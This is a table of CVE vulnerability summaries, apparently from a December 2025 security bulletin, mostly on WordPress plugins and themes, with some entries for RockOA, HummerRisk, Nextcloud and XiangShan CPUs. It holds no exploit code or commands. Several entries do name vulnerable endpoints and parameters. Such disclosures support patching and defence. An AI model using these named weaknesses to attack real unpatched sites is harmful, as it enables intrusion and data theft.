| multiparcels--MultiParcels Shipping For WooCommerce | Missing Authorization vulnerability in multiparcels MultiParcels Shipping For WooCommerce multiparcels-shipping-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MultiParcels Shipping For WooCommerce: from n/a through <= 1.30.12. | 2025-12-09 | not yet calculated | CVE-2025-62995 | https://vdp.patchstack.com/database/Wordpress/Plugin/multiparcels-shipping-for-woocommerce/vulnerability/wordpress-multiparcels-shipping-for-woocommerce-plugin-1-30-12-broken-access-control-vulnerability?_s_id=cve |
| Code Amp--Custom Layouts Post + Product grids made easy | Missing Authorization vulnerability in Code Amp Custom Layouts - Post + Product grids made easy custom-layouts allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Custom Layouts - Post + Product grids made easy: from n/a through <= 1.4.12. | 2025-12-09 | not yet calculated | CVE-2025-62996 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-layouts/vulnerability/wordpress-custom-layouts-post-product-grids-made-easy-plugin-1-4-12-broken-access-control-vulnerability?_s_id=cve |
| levelfourdevelopment--WP EasyCart | Insertion of Sensitive Information Into Sent Data vulnerability in levelfourdevelopment WP EasyCart wp-easycart allows Retrieve Embedded Sensitive Data. This issue affects WP EasyCart: from n/a through <= 5.8.11. | 2025-12-09 | not yet calculated | CVE-2025-62997 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-easycart/vulnerability/wordpress-wp-easycart-plugin-5-8-11-sensitive-data-exposure-vulnerability?_s_id=cve |
| themezaa--Litho Addons | Missing Authorization vulnerability in themezaa Litho Addons litho-addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Litho Addons: from n/a through <= 3.4. | 2025-12-09 | not yet calculated | CVE-2025-62999 | https://vdp.patchstack.com/database/Wordpress/Plugin/litho-addons/vulnerability/wordpress-litho-addons-plugin-3-4-broken-access-control-vulnerability?_s_id=cve |
| fuelthemes--North - Required Plugin | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes North - Required Plugin north-plugin allows PHP Local File Inclusion. This issue affects North - Required Plugin: from n/a through <= 1.4.2. | 2025-12-09 | not yet calculated | CVE-2025-63003 | https://vdp.patchstack.com/database/Wordpress/Plugin/north-plugin/vulnerability/wordpress-north-required-plugin-plugin-1-4-2-local-file-inclusion-vulnerability?_s_id=cve |
| Metagauss--EventPrime | Missing Authorization vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects EventPrime: from n/a through <= 4.2.4.1. | 2025-12-09 | not yet calculated | CVE-2025-63006 | https://vdp.patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-4-1-broken-access-control-vulnerability?_s_id=cve |
| Metagauss--EventPrime | Insertion of Sensitive Information Into Sent Data vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Retrieve Embedded Sensitive Data. This issue affects EventPrime: from n/a through <= 4.2.4.1. | 2025-12-09 | not yet calculated | CVE-2025-63007 | https://vdp.patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-4-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| weDevs--WP ERP | Missing Authorization vulnerability in weDevs WP ERP erp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP ERP: from n/a through <= 1.16.7. | 2025-12-09 | not yet calculated | CVE-2025-63008 | https://vdp.patchstack.com/database/Wordpress/Plugin/erp/vulnerability/wordpress-wp-erp-plugin-1-16-7-broken-access-control-vulnerability?_s_id=cve |
| yuvalo--WP Google Analytics Events | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in yuvalo WP Google Analytics Events wp-google-analytics-events allows Retrieve Embedded Sensitive Data. This issue affects WP Google Analytics Events: from n/a through <= 2.8.2. | 2025-12-09 | not yet calculated | CVE-2025-63009 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-google-analytics-events/vulnerability/wordpress-wp-google-analytics-events-plugin-2-8-2-sensitive-data-exposure-vulnerability?_s_id=cve |
| ThemesInflow--Hercules Core | Server-Side Request Forgery (SSRF) vulnerability in ThemesInflow Hercules Core hercules-core allows Server Side Request Forgery. This issue affects Hercules Core: from n/a through <= 7.4. | 2025-12-09 | not yet calculated | CVE-2025-63010 | https://vdp.patchstack.com/database/Wordpress/Plugin/hercules-core/vulnerability/wordpress-hercules-core-plugin-7-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| ThimPress--WP Hotel Booking | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress WP Hotel Booking wp-hotel-booking allows DOM-Based XSS. This issue affects WP Hotel Booking: from n/a through <= 2.2.7. | 2025-12-09 | not yet calculated | CVE-2025-63011 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-hotel-booking/vulnerability/wordpress-wp-hotel-booking-plugin-2-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThimPress--WP Hotel Booking | Cross-Site Request Forgery (CSRF) vulnerability in ThimPress WP Hotel Booking wp-hotel-booking allows Cross Site Request Forgery. This issue affects WP Hotel Booking: from n/a through <= 2.2.7. | 2025-12-09 | not yet calculated | CVE-2025-63012 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-hotel-booking/vulnerability/wordpress-wp-hotel-booking-plugin-2-2-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ThimPress--WP Hotel Booking | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThimPress WP Hotel Booking wp-hotel-booking allows Retrieve Embedded Sensitive Data. This issue affects WP Hotel Booking: from n/a through <= 2.2.7. | 2025-12-09 | not yet calculated | CVE-2025-63013 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-hotel-booking/vulnerability/wordpress-wp-hotel-booking-plugin-2-2-7-sensitive-data-exposure-vulnerability?_s_id=cve |
| paysera--WooCommerce Payment Gateway – Paysera | Missing Authorization vulnerability in paysera WooCommerce Payment Gateway – Paysera woo-payment-gateway-paysera allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WooCommerce Payment Gateway – Paysera: from n/a through <= 3.9.0. | 2025-12-09 | not yet calculated | CVE-2025-63015 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-payment-gateway-paysera/vulnerability/wordpress-woocommerce-payment-gateway-paysera-plugin-3-9-0-broken-access-control-vulnerability?_s_id=cve |
| Easy Payment--Payment Gateway for PayPal on WooCommerce | Missing Authorization vulnerability in Easy Payment Payment Gateway for PayPal on WooCommerce woo-paypal-gateway allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Payment Gateway for PayPal on WooCommerce: from n/a through <= 9.0.52. | 2025-12-09 | not yet calculated | CVE-2025-63023 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-paypal-gateway/vulnerability/wordpress-payment-gateway-for-paypal-on-woocommerce-plugin-9-0-52-broken-access-control-vulnerability?_s_id=cve |
| tychesoftwares--Order Delivery Date for WooCommerce | Missing Authorization vulnerability in tychesoftwares Order Delivery Date for WooCommerce order-delivery-date-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Order Delivery Date for WooCommerce: from n/a through <= 4.3.1. | 2025-12-09 | not yet calculated | CVE-2025-63024 | https://vdp.patchstack.com/database/Wordpress/Plugin/order-delivery-date-for-woocommerce/vulnerability/wordpress-order-delivery-date-for-woocommerce-plugin-4-3-1-broken-access-control-vulnerability?_s_id=cve |
| Xagio SEO--Xagio SEO | Missing Authorization vulnerability in Xagio SEO Xagio SEO xagio-seo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Xagio SEO: from n/a through <= 7.1.0.29. | 2025-12-09 | not yet calculated | CVE-2025-63025 | https://vdp.patchstack.com/database/Wordpress/Plugin/xagio-seo/vulnerability/wordpress-xagio-seo-plugin-7-1-0-29-broken-access-control-vulnerability?_s_id=cve |
| shinetheme--Traveler | Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Traveler: from n/a through <= 3.2.6. | 2025-12-09 | not yet calculated | CVE-2025-63028 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-broken-access-control-vulnerability?_s_id=cve |
| Saad Iqbal--New User Approve | Cross-Site Request Forgery (CSRF) vulnerability in Saad Iqbal New User Approve new-user-approve allows Cross Site Request Forgery. This issue affects New User Approve: from n/a through <= 3.2.0. | 2025-12-09 | not yet calculated | CVE-2025-63030 | https://vdp.patchstack.com/database/Wordpress/Plugin/new-user-approve/vulnerability/wordpress-new-user-approve-plugin-3-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Riyadh Ahmed--Make Section & Column Clickable For Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Riyadh Ahmed Make Section & Column Clickable For Elementor make-section-column-clickable-elementor allows Stored XSS. This issue affects Make Section & Column Clickable For Elementor: from n/a through <= 2.3. | 2025-12-09 | not yet calculated | CVE-2025-63033 | https://vdp.patchstack.com/database/Wordpress/Plugin/make-section-column-clickable-elementor/vulnerability/wordpress-make-section-column-clickable-for-elementor-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Steve Truman--Page View Count | Missing Authorization vulnerability in Steve Truman Page View Count page-views-count allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Page View Count: from n/a through <= 2.8.7. | 2025-12-09 | not yet calculated | CVE-2025-63034 | https://vdp.patchstack.com/database/Wordpress/Plugin/page-views-count/vulnerability/wordpress-page-view-count-plugin-2-8-7-settings-change-vulnerability?_s_id=cve |
| VibeThemes--WPLMS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VibeThemes WPLMS wplms_plugin allows DOM-Based XSS. This issue affects WPLMS: from n/a through <= 1.9.9.5.4. | 2025-12-09 | not yet calculated | CVE-2025-63035 | https://vdp.patchstack.com/database/Wordpress/Plugin/wplms_plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| DFDevelopment--Ronneby Theme Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DFDevelopment Ronneby Theme Core ronneby-core allows PHP Local File Inclusion. This issue affects Ronneby Theme Core: from n/a through <= 1.5.68. | 2025-12-09 | not yet calculated | CVE-2025-63036 | https://vdp.patchstack.com/database/Wordpress/Plugin/ronneby-core/vulnerability/wordpress-ronneby-theme-core-plugin-1-5-68-local-file-inclusion-vulnerability?_s_id=cve |
| DFDevelopment--Ronneby Theme Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DFDevelopment Ronneby Theme Core ronneby-core allows DOM-Based XSS. This issue affects Ronneby Theme Core: from n/a through <= 1.5.68. | 2025-12-09 | not yet calculated | CVE-2025-63037 | https://vdp.patchstack.com/database/Wordpress/Plugin/ronneby-core/vulnerability/wordpress-ronneby-theme-core-plugin-1-5-68-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Themeum--Tutor LMS Elementor Addons | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS Elementor Addons tutor-lms-elementor-addons allows Stored XSS. This issue affects Tutor LMS Elementor Addons: from n/a through <= 3.0.1. | 2025-12-09 | not yet calculated | CVE-2025-63042 | https://vdp.patchstack.com/database/Wordpress/Plugin/tutor-lms-elementor-addons/vulnerability/wordpress-tutor-lms-elementor-addons-plugin-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Xpro--Xpro Elementor Addons | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Xpro Xpro Elementor Addons xpro-elementor-addons allows DOM-Based XSS. This issue affects Xpro Elementor Addons: from n/a through <= 1.4.19.1. | 2025-12-09 | not yet calculated | CVE-2025-63044 | https://vdp.patchstack.com/database/Wordpress/Plugin/xpro-elementor-addons/vulnerability/wordpress-xpro-elementor-addons-plugin-1-4-19-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| averta--Master Slider Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in averta Master Slider Pro masterslider allows DOM-Based XSS. This issue affects Master Slider Pro: from n/a through <= 3.7.12. | 2025-12-09 | not yet calculated | CVE-2025-63045 | https://vdp.patchstack.com/database/Wordpress/Plugin/masterslider/vulnerability/wordpress-master-slider-pro-plugin-3-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro listingpro-plugin allows DOM-Based XSS. This issue affects ListingPro: from n/a through <= 2.9.9. | 2025-12-09 | not yet calculated | CVE-2025-63046 | https://vdp.patchstack.com/database/Wordpress/Plugin/listingpro-plugin/vulnerability/wordpress-listingpro-plugin-2-9-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ListingPro: from n/a through <= 2.9.9. | 2025-12-09 | not yet calculated | CVE-2025-63047 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-9-broken-access-control-vulnerability?_s_id=cve |
| CridioStudio--ListingPro Lead Form | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro Lead Form listingpro-lead-form allows DOM-Based XSS. This issue affects ListingPro Lead Form: from n/a through <= 1.0.2. | 2025-12-09 | not yet calculated | CVE-2025-63048 | https://vdp.patchstack.com/database/Wordpress/Plugin/listingpro-lead-form/vulnerability/wordpress-listingpro-lead-form-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CridioStudio--ListingPro Lead Form | Missing Authorization vulnerability in CridioStudio ListingPro Lead Form listingpro-lead-form allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects ListingPro Lead Form: from n/a through <= 1.0.2. | 2025-12-09 | not yet calculated | CVE-2025-63049 | https://vdp.patchstack.com/database/Wordpress/Plugin/listingpro-lead-form/vulnerability/wordpress-listingpro-lead-form-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve |
| sizam--REHub Framework | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sizam REHub Framework rehub-framework allows Stored XSS. This issue affects REHub Framework: from n/a through <= 19.9.8. | 2025-12-09 | not yet calculated | CVE-2025-63050 | https://vdp.patchstack.com/database/Wordpress/Plugin/rehub-framework/vulnerability/wordpress-rehub-framework-plugin-19-9-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| GalleryCreator--SimpLy Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GalleryCreator SimpLy Gallery simply-gallery-block allows Stored XSS. This issue affects SimpLy Gallery: from n/a through <= 3.2.8. | 2025-12-09 | not yet calculated | CVE-2025-63052 | https://vdp.patchstack.com/database/Wordpress/Plugin/simply-gallery-block/vulnerability/wordpress-simply-gallery-plugin-3-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ExpressTech Systems--Quiz And Survey Master | Missing Authorization vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Quiz And Survey Master: from n/a through <= 10.3.1. | 2025-12-09 | not yet calculated | CVE-2025-63054 | https://vdp.patchstack.com/database/Wordpress/Plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-10-3-1-broken-access-control-vulnerability?_s_id=cve |
| Liton Arefin--Master Addons for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liton Arefin Master Addons for Elementor master-addons allows Stored XSS. This issue affects Master Addons for Elementor: from n/a through <= 2.0.9.9. | 2025-12-09 | not yet calculated | CVE-2025-63055 | https://vdp.patchstack.com/database/Wordpress/Plugin/master-addons/vulnerability/wordpress-master-addons-for-elementor-plugin-2-0-9-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| bestwebsoft--Contact Form by BestWebSoft | Missing Authorization vulnerability in bestwebsoft Contact Form by BestWebSoft contact-form-plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Contact Form by BestWebSoft: from n/a through <= 4.3.5. | 2025-12-09 | not yet calculated | CVE-2025-63056 | https://vdp.patchstack.com/database/Wordpress/Plugin/contact-form-plugin/vulnerability/wordpress-contact-form-by-bestwebsoft-plugin-4-3-5-broken-access-control-vulnerability?_s_id=cve |
| Roxnor--Wp Ultimate Review | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Roxnor Wp Ultimate Review wp-ultimate-review allows DOM-Based XSS. This issue affects Wp Ultimate Review: from n/a through <= 2.3.6. | 2025-12-09 | not yet calculated | CVE-2025-63057 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-ultimate-review/vulnerability/wordpress-wp-ultimate-review-plugin-2-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Hiroaki Miyashita--Custom Field Template | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Hiroaki Miyashita Custom Field Template custom-field-template allows Retrieve Embedded Sensitive Data. This issue affects Custom Field Template: from n/a through <= 2.7.4. | 2025-12-09 | not yet calculated | CVE-2025-63058 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-field-template/vulnerability/wordpress-custom-field-template-plugin-2-7-4-sensitive-data-exposure-vulnerability?_s_id=cve |
| arscode--Ninja Popups | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in arscode Ninja Popups arscode-ninja-popups allows Stored XSS. This issue affects Ninja Popups: from n/a through <= 4.7.8. | 2025-12-09 | not yet calculated | CVE-2025-63059 | https://vdp.patchstack.com/database/Wordpress/Plugin/arscode-ninja-popups/vulnerability/wordpress-ninja-popups-plugin-4-7-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| hogash--Kallyas | Cross-Site Request Forgery (CSRF) vulnerability in hogash Kallyas kallyas. This issue affects Kallyas: from n/a through <= 4.2. | 2025-12-09 | not yet calculated | CVE-2025-63060 | https://vdp.patchstack.com/database/Wordpress/Theme/kallyas/vulnerability/wordpress-kallyas-theme-4-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| hogash--Kallyas | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hogash Kallyas kallyas allows DOM-Based XSS. This issue affects Kallyas: from n/a through <= 4.22.0. | 2025-12-09 | not yet calculated | CVE-2025-63061 | https://vdp.patchstack.com/database/Wordpress/Theme/kallyas/vulnerability/wordpress-kallyas-theme-4-22-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AndonDesign--UDesign Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AndonDesign UDesign Core u-design-core allows PHP Local File Inclusion. This issue affects UDesign Core: from n/a through <= 4.14.0. | 2025-12-09 | not yet calculated | CVE-2025-63062 | https://vdp.patchstack.com/database/Wordpress/Plugin/u-design-core/vulnerability/wordpress-udesign-core-plugin-4-14-0-local-file-inclusion-vulnerability?_s_id=cve |
| Yandex Metrika--Yandex.Metrica | Missing Authorization vulnerability in Yandex Metrika Yandex.Metrica wp-yandex-metrika allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Yandex.Metrica: from n/a through <= 1.2.2. | 2025-12-09 | not yet calculated | CVE-2025-63063 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-yandex-metrika/vulnerability/wordpress-yandex-metrica-plugin-1-2-2-broken-access-control-vulnerability?_s_id=cve |
| ashanjay--EventON | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ashanjay EventON eventon allows Stored XSS. This issue affects EventON: from n/a through <= 4.9.12. | 2025-12-09 | not yet calculated | CVE-2025-63064 | https://vdp.patchstack.com/database/Wordpress/Plugin/eventon/vulnerability/wordpress-eventon-plugin-4-9-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| David Lingren--Media Library Assistant | Authorization Bypass Through User-Controlled Key vulnerability in David Lingren Media Library Assistant media-library-assistant allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Media Library Assistant: from n/a through <= 3.30. | 2025-12-09 | not yet calculated | CVE-2025-63065 | https://vdp.patchstack.com/database/Wordpress/Plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-30-broken-access-control-vulnerability?_s_id=cve |
| p-themes--Porto Theme - Functionality | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in p-themes Porto Theme - Functionality porto-functionality allows Stored XSS. This issue affects Porto Theme - Functionality: from n/a through <= 3.6.2. | 2025-12-09 | not yet calculated | CVE-2025-63066 | https://vdp.patchstack.com/database/Wordpress/Plugin/porto-functionality/vulnerability/wordpress-porto-theme-functionality-plugin-3-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| p-themes--Porto Theme - Functionality | Missing Authorization vulnerability in p-themes Porto Theme - Functionality porto-functionality allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Porto Theme - Functionality: from n/a through <= 3.6.2. | 2025-12-09 | not yet calculated | CVE-2025-63067 | https://vdp.patchstack.com/database/Wordpress/Plugin/porto-functionality/vulnerability/wordpress-porto-theme-functionality-plugin-3-6-2-broken-access-control-vulnerability?_s_id=cve |
| sevenspark--Contact Form 7 Dynamic Text Extension | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in sevenspark Contact Form 7 Dynamic Text Extension contact-form-7-dynamic-text-extension allows Code Injection. This issue affects Contact Form 7 Dynamic Text Extension: from n/a through <= 5.0.3. | 2025-12-09 | not yet calculated | CVE-2025-63068 | https://vdp.patchstack.com/database/Wordpress/Plugin/contact-form-7-dynamic-text-extension/vulnerability/wordpress-contact-form-7-dynamic-text-extension-plugin-5-0-3-content-injection-vulnerability?_s_id=cve |
| Vinod Dalvi--Ivory Search | Missing Authorization vulnerability in Vinod Dalvi Ivory Search add-search-to-menu allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ivory Search: from n/a through <= 5.5.12. | 2025-12-09 | not yet calculated | CVE-2025-63069 | https://vdp.patchstack.com/database/Wordpress/Plugin/add-search-to-menu/vulnerability/wordpress-ivory-search-plugin-5-5-12-broken-access-control-vulnerability?_s_id=cve |
| Shahjada--Download Manager | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Shahjada Download Manager download-manager allows Retrieve Embedded Sensitive Data. This issue affects Download Manager: from n/a through <= 3.3.32. | 2025-12-09 | not yet calculated | CVE-2025-63070 | https://vdp.patchstack.com/database/Wordpress/Plugin/download-manager/vulnerability/wordpress-download-manager-plugin-3-3-32-sensitive-data-exposure-vulnerability?_s_id=cve |
| averta--Shortcodes and extra features for Phlox theme | Insertion of Sensitive Information Into Sent Data vulnerability in averta Shortcodes and extra features for Phlox theme auxin-elements allows Retrieve Embedded Sensitive Data. This issue affects Shortcodes and extra features for Phlox theme: from n/a through <= 2.17.12. | 2025-12-09 | not yet calculated | CVE-2025-63071 | https://vdp.patchstack.com/database/Wordpress/Plugin/auxin-elements/vulnerability/wordpress-shortcodes-and-extra-features-for-phlox-theme-plugin-2-17-12-sensitive-data-exposure-vulnerability?_s_id=cve |
| THEMECO--Cornerstone | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in THEMECO Cornerstone cornerstone allows Stored XSS. This issue affects Cornerstone: from n/a through <= 7.7.3. | 2025-12-09 | not yet calculated | CVE-2025-63072 | https://vdp.patchstack.com/database/Wordpress/Plugin/cornerstone/vulnerability/wordpress-cornerstone-plugin-7-7-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dream-Theme--The7 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dream-Theme The7 dt-the7 allows DOM-Based XSS. This issue affects The7: from n/a through <= 12.8.0.2. | 2025-12-09 | not yet calculated | CVE-2025-63073 | https://vdp.patchstack.com/database/Wordpress/Theme/dt-the7/vulnerability/wordpress-the7-theme-12-8-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dream-Theme--The7 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Dream-Theme The7 dt-the7 allows PHP Local File Inclusion. This issue affects The7: from n/a through <= 12.8.0.2. | 2025-12-09 | not yet calculated | CVE-2025-63074 | https://vdp.patchstack.com/database/Wordpress/Theme/dt-the7/vulnerability/wordpress-the7-theme-12-8-0-2-local-file-inclusion-vulnerability?_s_id=cve |
| muffingroup--Betheme | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in muffingroup Betheme betheme allows DOM-Based XSS. This issue affects Betheme: from n/a through <= 28.1.7. | 2025-12-09 | not yet calculated | CVE-2025-63075 | https://vdp.patchstack.com/database/Wordpress/Theme/betheme/vulnerability/wordpress-betheme-theme-28-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dream-Theme--The7 Elements | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Dream-Theme The7 Elements dt-the7-core allows PHP Local File Inclusion. This issue affects The7 Elements: from n/a through <= 2.7.11. | 2025-12-09 | not yet calculated | CVE-2025-63076 | https://vdp.patchstack.com/database/Wordpress/Plugin/dt-the7-core/vulnerability/wordpress-the7-elements-plugin-2-7-11-local-file-inclusion-vulnerability?_s_id=cve |
| HappyMonster--Happy Addons for Elementor | Missing Authorization vulnerability in HappyMonster Happy Addons for Elementor happy-elementor-addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Happy Addons for Elementor: from n/a through <= 3.20.2. | 2025-12-09 | not yet calculated | CVE-2025-63077 | https://vdp.patchstack.com/database/Wordpress/Plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-2-broken-access-control-vulnerability?_s_id=cve |
| n/a--XiangShan Nanhu V2 and XiangShan Kunminghu V3 | XiangShan Nanhu V2 and XiangShan Kunminghu V3 were discovered to use speculative execution and indirect branch prediction, allowing attackers to access sensitive information via side-channel analysis of the data cache. | 2025-12-10 | not yet calculated | CVE-2025-63094 | https://github.com/necst/aca25-xiangshan-spectre/blob/main/README.md https://github.com/necst/aca25-xiangshan-spectre |
| n/a--HummerRisk through v1.5.0 | HummerRisk through v1.5.0 uses a vulnerable Snakeyaml component, allowing attackers with normal user privileges to call the /rule/add API and thereby achieve RCE and take over the server. | 2025-12-08 | not yet calculated | CVE-2025-63721 | https://github.com/k1ng0fic3/secrisk/blob/main/README.md https://gist.github.com/k1ng0fic3/e8c8c9353fff8fa95e2c2952587e9266 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | Cross-site scripting (XSS) vulnerability in function urltestAction in file cliAction.php in Xinhu Rainrock RockOA 2.7.0 allows remote attackers to inject arbitrary web script or HTML via the m parameter to the task.php endpoint. | 2025-12-09 | not yet calculated | CVE-2025-63737 | https://github.com/rainrocka/xinhu/issues/10 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | An issue was discovered in file index.php in Xinhu Rainrock RockOA 2.7.0 allowing attackers to gain sensitive information via phpinfo via the a parameter to the index.php. | 2025-12-09 | not yet calculated | CVE-2025-63738 | https://github.com/rainrocka/xinhu/issues/11 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | An issue was discovered in function phpinisaveAction in file webmain/system/cogini/coginiAction.php in Xinhu Rainrock RockOA 2.7.0 allowing authenticated attackers to modify PHP configuration files via the a parameter to the index.php endpoint. | 2025-12-09 | not yet calculated | CVE-2025-63739 | https://github.com/rainrocka/xinhu/issues/12 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | SQL Injection vulnerability in function getselectdataAjax in file inputAction.php in Xinhu Rainrock RockOA 2.7.0 allows attackers to gain sensitive information, including administrator accounts, password hashes, database structure, and other critical data via the actstr parameter. | 2025-12-09 | not yet calculated | CVE-2025-63740 | https://github.com/rainrocka/xinhu/issues/13 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | SQL Injection vulnerability in function setwxqyAction in file webmain/task/api/loginAction.php in Xinhu Rainrock RockOA 2.7.0 allows attackers to gain sensitive information, including administrator accounts, password hashes, database structure, and other critical data via the shouji and userid parameters. | 2025-12-09 | not yet calculated | CVE-2025-63742 | https://github.com/rainrocka/xinhu/issues/14 |
| n/a--JXL 9 Inch Car Android Double Din Player Android v12.0 | An issue in the Bluetooth firmware of JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted Link Manager Protocol (LMP) packet. | 2025-12-10 | not yet calculated | CVE-2025-63895 | http://jxl.com https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-63895/blob/main/README.md |
| n/a--Nextcloud Server 30.0.0 | Nextcloud Server 30.0.0 is vulnerable to an Insecure Direct Object Reference (IDOR) in the /core/preview endpoint. Any authenticated user can access previews of arbitrary files belonging to other users by manipulating the field parameter. This allows unauthorized disclosure of sensitive data, such as text files or images, without prior sharing permissions. | 2025-12-12 | not yet calculated | CVE-2025-64011 | https://drive.google.com/file/d/1eD3PN-u1caZYgGH96XHmJ7h_OBXEAHW4/view?usp=sharing https://nextcloud.com https://gist.github.com/tarekramm/586dfe2d113fedfee6d71182570fc090 |
